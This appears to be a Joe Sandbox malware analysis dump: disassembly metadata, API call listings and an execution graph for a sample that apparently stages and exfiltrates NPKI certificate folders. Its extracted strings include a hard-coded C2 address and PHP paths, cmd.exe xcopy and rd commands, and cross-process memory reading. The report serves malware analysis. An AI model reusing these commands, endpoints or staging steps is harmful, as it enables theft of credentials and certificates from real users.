                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #567$#1146#1168#324H_prologIconLoad
                                                        • String ID:
                                                        • API String ID: 2995884226-0
                                                        • Opcode ID: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction ID: 6195de06ed0686a01f6ea18af6a3778e2a15774cd3760b5cb09f72b4f9ec5dc5
                                                        • Opcode Fuzzy Hash: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction Fuzzy Hash: EF01C0B1A00384AAD711EB65C50979FBBA4FF91308F00887EE586732C1C7F81604D7A9
                                                        APIs
                                                        Strings
                                                        • ekimhuqcroanflvzgdjtxypswb, xrefs: 0040175B
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: rand$CountTicksrand
                                                        • String ID: ekimhuqcroanflvzgdjtxypswb
                                                        • API String ID: 3923125369-3762667353
                                                        • Opcode ID: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction ID: 0f0927eb61d3c32e8c18992b3a3ed773e98e9a1b9926048b9e47f112dc32a9e4
                                                        • Opcode Fuzzy Hash: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction Fuzzy Hash: 1FF04C33B0030457C7107F6A6984D9BBB999BC9720F01403EFE046B281C6B5940286B4
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401D74
                                                        • #324.MFC42(00000064,00000000), ref: 00401D85
                                                        • #540.MFC42(00000064,00000000), ref: 00401D93
                                                        • #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #324#540#860H_prolog
                                                        • String ID: RedTom21@HotMail.com
                                                        • API String ID: 1715175771-4020391281
                                                        • Opcode ID: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction ID: 78d62cf22874564550b960a1e2f1980c8c55d506c68ef3259133a31bc2e11175
                                                        • Opcode Fuzzy Hash: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction Fuzzy Hash: 9FE06571B403509BD714AB99C50A79EB6A9EF91714F10447FA902773C1C7FC6E009699
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • memset.MSVCRT ref: 00401814
                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0040182C
                                                        • memcpy.MSVCRT(?,?,?), ref: 00401847
                                                        • CloseHandle.KERNEL32(?), ref: 00401859
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3052882905-0
                                                        • Opcode ID: 44267068a63abdb27b6f021e64f533e27db4bc8761671b15b42d38a0f2456496
                                                        • Instruction ID: e342418d90b68a1d807531b6c152f1c53a72d441e6209e681be522bd43cf2dcc
                                                        • Opcode Fuzzy Hash: 44267068a63abdb27b6f021e64f533e27db4bc8761671b15b42d38a0f2456496
                                                        • Instruction Fuzzy Hash: 8111BEB2900148BFDB119F98CC81BDA37ADEB08355F108076F709F6190D2B0AF848B68
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004024F1
                                                        • _ftol.MSVCRT ref: 00402517
                                                        • _ftol.MSVCRT ref: 00402525
                                                        • #4299.MFC42(0000000F,00000041,?,?,00000001), ref: 00402549
                                                        • #4299.MFC42(0000000F,?,?,000000F1,00000001), ref: 0040256B
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #4299_ftol$ClientRect
                                                        • String ID:
                                                        • API String ID: 3171108694-0
                                                        • Opcode ID: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction ID: 3880c801f612beb6246e745b78d7e2d3a19b48e5053d162d2e00decfba834721
                                                        • Opcode Fuzzy Hash: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction Fuzzy Hash: C51151B1A00209BFDB10DBA9DE59BAEB778FF40744F10027AF501B61E5D7B49D40DA28
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004020DF
                                                        • #2379.MFC42 ref: 00402125
                                                          • Part of subcall function 00401D6F: _EH_prolog.MSVCRT ref: 00401D74
                                                          • Part of subcall function 00401D6F: #324.MFC42(00000064,00000000), ref: 00401D85
                                                          • Part of subcall function 00401D6F: #540.MFC42(00000064,00000000), ref: 00401D93
                                                          • Part of subcall function 00401D6F: #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        • #2514.MFC42 ref: 00402103
                                                        • #800.MFC42 ref: 00402112
                                                        • #641.MFC42 ref: 0040211E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$#2379#2514#324#540#641#800#860
                                                        • String ID:
                                                        • API String ID: 1337987987-0
                                                        • Opcode ID: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction ID: 0c37060d93abf7ffef3ab529cf96d0046ab1b8bea522c7ef1cdfd7726eb284c9
                                                        • Opcode Fuzzy Hash: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction Fuzzy Hash: 09F0FE71810518DADB25EFA5C65A7ACB730BF20314F60417FA412761D2DBBC5A09CA59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #656$#641H_prolog
                                                        • String ID:
                                                        • API String ID: 2321568657-0
                                                        • Opcode ID: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction ID: e680012da702e7b92035de08c4d7561f67a84a50463a6348afc1be6ddfe969e7
                                                        • Opcode Fuzzy Hash: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction Fuzzy Hash: 5DF03071915654DADB2CEBA5CA197DDBBA4BF04318F00456FE066732C2CBF81B08C755
                                                        APIs
                                                        • #2379.MFC42 ref: 004015D2
                                                        • #4299.MFC42(00000000,00000000,00000028,?,00000001), ref: 00401602
                                                        • #4299.MFC42(00000032,00000000,0000012C,?,00000001), ref: 00401624
                                                        • #4299.MFC42(00000168,00000000,00000000,?,00000001), ref: 00401645
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #4299$#2379
                                                        • String ID:
                                                        • API String ID: 453929936-0
                                                        • Opcode ID: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction ID: 396461380f4f282afe083d313e8dd4ae14482c7760a999395c5db5fab6d4a27c
                                                        • Opcode Fuzzy Hash: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction Fuzzy Hash: AF01B131240700ABD5318A59CC81FABB3AAAFC4B05F280E2FF183391D1D7BB8841C619
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #609#641#693H_prolog
                                                        • String ID:
                                                        • API String ID: 432028610-0
                                                        • Opcode ID: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction ID: c1b141184ca5cae31352d23a373f4eac66a41ce64f7327093406d0e5d71bec99
                                                        • Opcode Fuzzy Hash: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction Fuzzy Hash: F3F0A070920664DACB18FBA4C6193DDBBB8AF14308F00466FA062732C2CBF81B04C795

                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:4.4%
                                                        Signature Coverage:3.2%
                                                        Total number of Nodes:950
                                                        Total number of Limit Nodes:29
100084c0 6371->6372 6373 100084dc ReleaseMutex CloseHandle 6372->6373 6374 10004da0 11 API calls 6372->6374 6373->6341 6375 100084d4 6374->6375 6375->6373 6377 10001000 lstrcpy 6376->6377 6378 10007f9a 6377->6378 6379 10007fd5 _CxxThrowException 6378->6379 6380 10007fea 6378->6380 6379->6380 6381 10008028 6380->6381 6382 1000800d _CxxThrowException 6380->6382 6383 1000807e RegCloseKey 6381->6383 6384 1000803e lstrlen 6381->6384 6382->6362 6383->6362 6414 10007dd0 6384->6414 6387->6364 6389 1000822d 6388->6389 6390 10008233 6389->6390 6391 10008270 GetLastError 6389->6391 6392 100082aa wsprintfA 6389->6392 6390->6343 6391->6392 6396 1000827d 6391->6396 6393 100082d8 lstrlen 6392->6393 6394 100082f7 wsprintfA 6393->6394 6397 1000832e 6394->6397 6395 1000828e 6395->6343 6396->6392 6396->6395 6398 10008332 _CxxThrowException 6397->6398 6399 10008347 SetLastError 6397->6399 6398->6399 6401 10008376 _CxxThrowException 6399->6401 6402 1000838b RegCloseKey RegOpenKeyExA 6399->6402 6401->6402 6403 10008400 SetLastError 6402->6403 6404 100083eb _CxxThrowException 6402->6404 6406 10008455 RegCloseKey 6403->6406 6407 10008428 _CxxThrowException 6403->6407 6404->6403 6424 100080a0 6406->6424 6408 10008444 6407->6408 6409 1000844f 6407->6409 6408->6409 6411 10008449 GetLastError 6408->6411 6409->6343 6411->6409 6412 10008465 RegCloseKey 6412->6343 6415 10007e07 6414->6415 6416 10007e55 6414->6416 6417 10007e35 RegOpenKeyExA 6415->6417 6418 10007eb6 RegOpenKeyExA 6415->6418 6419 10007ee6 RegOpenKeyExA 6415->6419 6420 10007e0e 6415->6420 6423 10007f3b RegCloseKey RegCloseKey 6416->6423 6417->6416 6418->6416 6419->6416 6420->6416 6420->6417 6422 10007f27 WinExec WinExec WinExec 6422->6383 6423->6422 6425 100080b5 6424->6425 6426 10008104 GetLastError 6425->6426 6428 10008159 6425->6428 6429 10008129 6425->6429 6427 10008111 6426->6427 6426->6429 6427->6412 6428->6412 6429->6428 6430 10008149 Sleep 6429->6430 6430->6429 6431->6085 6443 10004b10 GetShortPathNameA 6432->6443 6434 
10009089 6435 10001000 lstrcpy 6434->6435 6436 100090b0 6435->6436 6444 10004c20 RegCreateKeyExA 6436->6444 6438 100090be wsprintfA 6445 10004cc0 RegSetValueExA 6438->6445 6440 10009112 6446 10004c60 RegCloseKey 6440->6446 6442 1000911f 6443->6434 6444->6438 6445->6440 6446->6442 6449 100096b9 6447->6449 6448 10009f4e 6448->6102 6449->6448 6551 1000a020 6449->6551 6453 10009775 6453->6448 6560 10009f80 6453->6560 6456 10006000 InterlockedDecrement 6457 100097e2 6456->6457 6457->6448 6458 10009f80 5 API calls 6457->6458 6459 100097f8 6458->6459 6460 10009f80 5 API calls 6459->6460 6461 1000980e 6460->6461 6568 1000a0c0 6461->6568 6463 10009824 6464 10006000 InterlockedDecrement 6463->6464 6465 10009835 6464->6465 6466 100098b6 6465->6466 6467 10009f80 5 API calls 6465->6467 6469 10009f80 5 API calls 6466->6469 6468 1000985a 6467->6468 6470 1000a0c0 2 API calls 6468->6470 6474 100098d2 6469->6474 6471 10009870 6470->6471 6472 10006000 InterlockedDecrement 6471->6472 6473 10009881 6472->6473 6475 10009f80 5 API calls 6473->6475 6476 10006000 InterlockedDecrement 6474->6476 6477 1000988f 6475->6477 6484 1000990d 6476->6484 6478 1000a0c0 2 API calls 6477->6478 6479 100098a5 6478->6479 6480 10006000 InterlockedDecrement 6479->6480 6480->6466 6481 10006000 InterlockedDecrement 6483 1000996e 6481->6483 6482 10006000 InterlockedDecrement 6482->6448 6493 100099bc 6483->6493 6574 1000a410 6483->6574 6484->6481 6506 10009911 6484->6506 6486 1000999b 6607 1000a230 6486->6607 6489 10006000 InterlockedDecrement 6490 100099ad 6489->6490 6491 10006000 InterlockedDecrement 6490->6491 6491->6493 6492 10009a07 6496 10009a25 6492->6496 6615 100117f5 6492->6615 6493->6492 6493->6506 6610 1000a250 6493->6610 6497 10009a58 6496->6497 6618 1000a290 6496->6618 6499 10006000 InterlockedDecrement 6497->6499 6500 10009a70 6499->6500 6502 10009f80 5 API calls 6500->6502 6503 10009d6a 6500->6503 6510 10009af4 6500->6510 6501 10009f3b 6505 10006000 InterlockedDecrement 6501->6505 6514 10009ab9 
6502->6514 6503->6501 6504 10009df5 6503->6504 6508 10009f80 5 API calls 6503->6508 6504->6501 6507 10009f80 5 API calls 6504->6507 6505->6506 6506->6482 6511 10009e21 6507->6511 6517 10009dba 6508->6517 6509 10009b30 6515 100117f5 _CxxThrowException 6509->6515 6522 10009b4e 6509->6522 6510->6503 6510->6509 6512 1000a250 5 API calls 6510->6512 6513 10009f80 5 API calls 6511->6513 6512->6509 6519 10009e33 6513->6519 6516 10006000 InterlockedDecrement 6514->6516 6515->6522 6516->6510 6518 10006000 InterlockedDecrement 6517->6518 6518->6504 6520 10009f80 5 API calls 6519->6520 6523 10009e9c 6520->6523 6521 10009be8 6526 100117f5 _CxxThrowException 6521->6526 6529 10009c06 6521->6529 6522->6521 6524 1000a250 5 API calls 6522->6524 6525 10006000 InterlockedDecrement 6523->6525 6524->6521 6527 10009ed4 6525->6527 6526->6529 6528 10009f80 5 API calls 6527->6528 6531 10009ee2 6528->6531 6530 10006000 InterlockedDecrement 6529->6530 6533 10009c41 6530->6533 6534 10006000 InterlockedDecrement 6531->6534 6532 10009c67 6537 100117f5 _CxxThrowException 6532->6537 6541 10009c85 6532->6541 6533->6532 6535 1000a250 5 API calls 6533->6535 6536 10009f29 6534->6536 6535->6532 6538 10006000 InterlockedDecrement 6536->6538 6537->6541 6539 10009f32 6538->6539 6540 10006000 InterlockedDecrement 6539->6540 6540->6501 6542 10006000 InterlockedDecrement 6541->6542 6544 10009cc0 6542->6544 6543 10009ce6 6546 100117f5 _CxxThrowException 6543->6546 6547 10009d04 6543->6547 6544->6543 6545 1000a250 5 API calls 6544->6545 6545->6543 6546->6547 6548 10006000 InterlockedDecrement 6547->6548 6549 10009d4d 6548->6549 6550 10006000 InterlockedDecrement 6549->6550 6550->6503 6552 1000a041 6551->6552 6553 1000a084 6552->6553 6556 100117f5 _CxxThrowException 6552->6556 6554 10009738 6553->6554 6555 100117f5 _CxxThrowException 6553->6555 6557 10006000 6554->6557 6555->6554 6556->6553 6558 1000600a InterlockedDecrement 6557->6558 6559 10006018 6557->6559 6558->6559 6559->6453 6561 10009fa1 6560->6561 6562 
10009fe3 6561->6562 6622 100116b0 6561->6622 6564 100097a8 6562->6564 6566 100117f5 _CxxThrowException 6562->6566 6564->6456 6566->6564 6567 100117f5 _CxxThrowException 6567->6562 6571 1000a0e9 6568->6571 6569 1000a1d7 InterlockedDecrement 6570 1000a1e5 6569->6570 6570->6463 6572 100117f5 _CxxThrowException 6571->6572 6573 1000a169 6571->6573 6572->6573 6573->6569 6573->6570 6575 1000a5f4 6574->6575 6579 1000a448 6574->6579 6576 1000a624 6575->6576 6577 1000a602 InterlockedIncrement 6575->6577 6576->6486 6577->6576 6578 1000a614 InterlockedDecrement 6577->6578 6578->6576 6579->6575 6580 1000a492 6579->6580 6581 1000a250 5 API calls 6579->6581 6582 100117f5 _CxxThrowException 6580->6582 6583 1000a4ab 6580->6583 6581->6580 6582->6583 6584 1000a4e7 6583->6584 6631 10006050 InterlockedDecrement 6583->6631 6586 1000a54b 6584->6586 6587 1000a4ff 6584->6587 6594 1000a537 6584->6594 6588 1000a596 6586->6588 6589 1000a554 6586->6589 6590 10006050 InterlockedDecrement 6587->6590 6593 1000a510 6587->6593 6647 1000a770 6588->6647 6637 1000a7d0 6589->6637 6590->6593 6592 1000a563 6596 1000a578 6592->6596 6597 1000a56e InterlockedIncrement 6592->6597 6593->6594 6633 1000a730 6593->6633 6594->6575 6599 100117f5 _CxxThrowException 6594->6599 6602 10006000 InterlockedDecrement 6596->6602 6597->6596 6599->6575 6604 1000a581 6602->6604 6604->6594 6605 10006050 InterlockedDecrement 6604->6605 6605->6594 6606 100117f5 _CxxThrowException 6606->6594 6608 100099a4 6607->6608 6609 1000a236 InterlockedIncrement 6607->6609 6608->6489 6609->6608 6611 100116b0 5 API calls 6610->6611 6613 1000a26c 6611->6613 6612 1000a280 6612->6492 6613->6612 6614 100117f5 _CxxThrowException 6613->6614 6614->6612 6656 10011803 6615->6656 6619 1000a2b3 6618->6619 6620 100117f5 _CxxThrowException 6619->6620 6621 1000a305 6619->6621 6620->6621 6621->6497 6623 100116bf lstrlen 6622->6623 6627 10009fcf 6622->6627 6624 10010f90 6623->6624 6625 100116d8 MultiByteToWideChar 6624->6625 6626 100116f3 GetLastError 
6625->6626 6625->6627 6628 1001170d 6626->6628 6629 100116ff GetLastError 6626->6629 6627->6562 6627->6567 6630 100117f5 _CxxThrowException 6628->6630 6629->6628 6630->6627 6632 10006062 6631->6632 6632->6584 6634 1000a74d 6633->6634 6635 1000a761 6634->6635 6636 100117f5 _CxxThrowException 6634->6636 6635->6594 6636->6635 6646 1000a80d 6637->6646 6638 1000a961 InterlockedIncrement 6639 1000a973 InterlockedDecrement 6638->6639 6641 1000a981 6638->6641 6639->6641 6640 1000a947 6640->6638 6640->6641 6641->6592 6642 100117f5 _CxxThrowException 6642->6646 6643 1000a290 _CxxThrowException 6643->6646 6644 1000a8de InterlockedDecrement 6644->6646 6645 1000a912 InterlockedDecrement 6645->6646 6646->6640 6646->6642 6646->6643 6646->6644 6646->6645 6648 1000a77c 6647->6648 6649 1000a5b2 6648->6649 6650 100117f5 _CxxThrowException 6648->6650 6651 1000a650 6649->6651 6650->6649 6652 1000a670 InterlockedDecrement 6651->6652 6654 1000a67e 6651->6654 6652->6654 6653 1000a5c0 6653->6594 6653->6606 6654->6653 6655 100117f5 _CxxThrowException 6654->6655 6655->6653 6660 10011827 6656->6660 6659 10011800 6659->6496 6661 10011819 _CxxThrowException 6660->6661 6661->6659 6663 1000676a 6662->6663 6675 100060e0 6663->6675 6665 10006772 wsprintfA 6666 10006240 2 API calls 6665->6666 6667 100067cb wsprintfA wsprintfA CreateDirectoryA 6666->6667 6678 10005130 CreateFileA WriteFile CloseHandle 6667->6678 6669 10006847 6679 10005a10 6669->6679 6672 10006863 OpenProcess 6673 1000689d 6672->6673 6674 10006879 CreateThread 6672->6674 6673->6127 6674->6673 6709 10006630 6674->6709 6676 1000611f 6675->6676 6677 10006152 10 API calls 6676->6677 6677->6665 6678->6669 6681 10005a2f 6679->6681 6680 10005acb 6682 100117f5 _CxxThrowException 6680->6682 6684 10005aec 6680->6684 6681->6680 6683 100117f5 _CxxThrowException 6681->6683 6682->6684 6683->6680 6685 10005b29 wcscat 6684->6685 6686 10006050 InterlockedDecrement 6684->6686 6689 10005b80 6685->6689 6686->6685 6688 10005bc1 6690 100117f5 
_CxxThrowException 6688->6690 6691 10005be2 6688->6691 6689->6688 6692 100117f5 _CxxThrowException 6689->6692 6690->6691 6693 10005c42 6691->6693 6694 100116b0 5 API calls 6691->6694 6692->6688 6696 100117f5 _CxxThrowException 6693->6696 6698 10005c60 6693->6698 6695 10005c29 6694->6695 6695->6693 6697 100117f5 _CxxThrowException 6695->6697 6696->6698 6697->6693 6699 10005c95 6698->6699 6700 10006050 InterlockedDecrement 6698->6700 6701 10006050 InterlockedDecrement 6699->6701 6706 10005cab 6699->6706 6700->6699 6701->6706 6702 10005f97 6702->6672 6702->6673 6703 100117f5 _CxxThrowException 6703->6706 6704 10005e34 InterlockedDecrement 6705 10005e4b _strcmpi 6704->6705 6704->6706 6705->6706 6706->6702 6706->6703 6706->6704 6706->6705 6707 10005f55 InterlockedDecrement 6706->6707 6708 10011725 wcslen WideCharToMultiByte GetLastError GetLastError _CxxThrowException 6706->6708 6707->6706 6708->6706 6712 1000665e 6709->6712 6710 10006731 6713 10006737 CloseHandle 6710->6713 6711 1000667f VirtualQueryEx 6711->6710 6711->6712 6712->6710 6712->6711 6714 100066d4 ReadProcessMemory 6712->6714 6716 10006380 6712->6716 6714->6712 6717 1000638a 6716->6717 6718 100063ea wsprintfA 6717->6718 6720 100065d3 6717->6720 6719 10006240 2 API calls 6718->6719 6721 1000643c wsprintfA wsprintfA CreateDirectoryA 6719->6721 6720->6712 6724 10005130 CreateFileA WriteFile CloseHandle 6721->6724 6723 100064c7 14 API calls 6723->6717 6724->6723 6725->6142 6727 100078c3 6726->6727 6745 10004940 InternetOpenA 6727->6745 6729 100078eb 6730 100078f2 6729->6730 6746 10004960 InternetOpenUrlA 6729->6746 6730->6145 6732 10007924 6732->6145 6733 1000791a 6733->6732 6739 10007968 6733->6739 6735 100079b9 MultiByteToWideChar 6735->6739 6736 100079d8 MultiByteToWideChar WideCharToMultiByte 6736->6739 6737 10007a0e WideCharToMultiByte 6737->6739 6738 10007a57 6740 10007b43 wsprintfA 6738->6740 6742 10007ad1 6738->6742 6739->6735 6739->6736 6739->6737 6739->6738 6747 10004990 InternetReadFile 6739->6747 
6741 10007b64 6740->6741 6743 10007b96 strrchr 6741->6743 6742->6145 6744 10007ba6 6743->6744 6744->6145 6745->6729 6746->6733 6747->6739 6748 f307dd 6749 f3080d 6748->6749 6750 f3083b VirtualAlloc 6749->6750 6753 f3086a 6750->6753 6751 f3090c MessageBoxA ExitProcess 6752 f30926 6755 f30954 VirtualFree 6752->6755 6753->6751 6753->6752 6754 f308ab 6753->6754 6756 f308bb wsprintfA 6754->6756 6758 f308cb wsprintfA 6754->6758 6759 f30906 6756->6759 6758->6759 6759->6751 7913 10011330 7914 1001130a 7913->7914 7914->7913 7915 10011a66 9 API calls 7914->7915 7915->7914 7269 10010150 7272 10010170 7269->7272 7271 10010165 7273 100101e9 7272->7273 7275 1001017f 7272->7275 7274 100101f0 ReadFile 7273->7274 7273->7275 7274->7275 7275->7271 6776 f30fa4 VirtualProtect 6777 f30fe3 VirtualProtect 6776->6777 6778 f30fdf 6776->6778 6778->6777 7308 10001170 7309 10001180 7308->7309 7310 10001000 lstrcpy 7309->7310 7311 1000118a 7310->7311 7303 f30983 7304 f3098d LoadLibraryA 7303->7304 7305 f309a5 7304->7305 7305->7304 7306 f309ab GetProcAddress 7305->7306 7307 f309c8 7305->7307 7306->7305 7987 10001770 7988 10001780 7987->7988 7989 10001000 lstrcpy 7988->7989 7990 1000178a GetProcAddress 7989->7990 5783 10002580 5784 10002590 5783->5784 5787 10001000 5784->5787 5786 1000259a GetProcAddress 5788 1000102c 5787->5788 5789 1000114e lstrcpy 5788->5789 5790 10001161 5789->5790 5790->5786 7357 10005990 7358 10005995 7357->7358 7361 10010feb 7358->7361 7364 10010fbf 7361->7364 7363 100059ba 7365 10010fd4 __dllonexit 7364->7365 7366 10010fc8 _onexit 7364->7366 7365->7363 7366->7363 8044 1000fba0 8045 1000fbab 8044->8045 8046 1000fbad 8044->8046 8049 1000fbf0 8046->8049 8048 1000fbbc 8050 1000fc05 8049->8050 8051 1000fcc4 WriteFile 8050->8051 8052 1000fc7c 8050->8052 8051->8048 8052->8048 8088 1000a7b0 8089 1000a7b7 8088->8089 8090 1000a7c1 8089->8090 8091 100117f5 _CxxThrowException 8089->8091 8091->8090 7444 100059d0 7445 100059d5 7444->7445 7446 10010feb 2 API calls 7445->7446 7447 
100059fa 7446->7447

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: lstrcatrand$FileFindlstrcpy$CountFirstNextTick_strcmpisrand
                                                        • String ID: %s\%s$*.*$.$/u.php$09161305.txt$107.163.241.204:12354/show.php$NPKI$P$c:\%c%c%c%c.%c%c%c$c:\%s$cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit$cmd.exe /c rd /q /s "c:\%s"
                                                        • API String ID: 3781771675-4019994392
                                                        • Opcode ID: 2284cdc7a81e1ca56d47e462f78087d377d0c49b06d915c65bae469ad145cbd7
                                                        • Instruction ID: a4cd3bd12e50bbdbb4defcecebe161b9358dfbd0595dc6434b30c1e57eafc0f0
                                                        • Opcode Fuzzy Hash: 2284cdc7a81e1ca56d47e462f78087d377d0c49b06d915c65bae469ad145cbd7
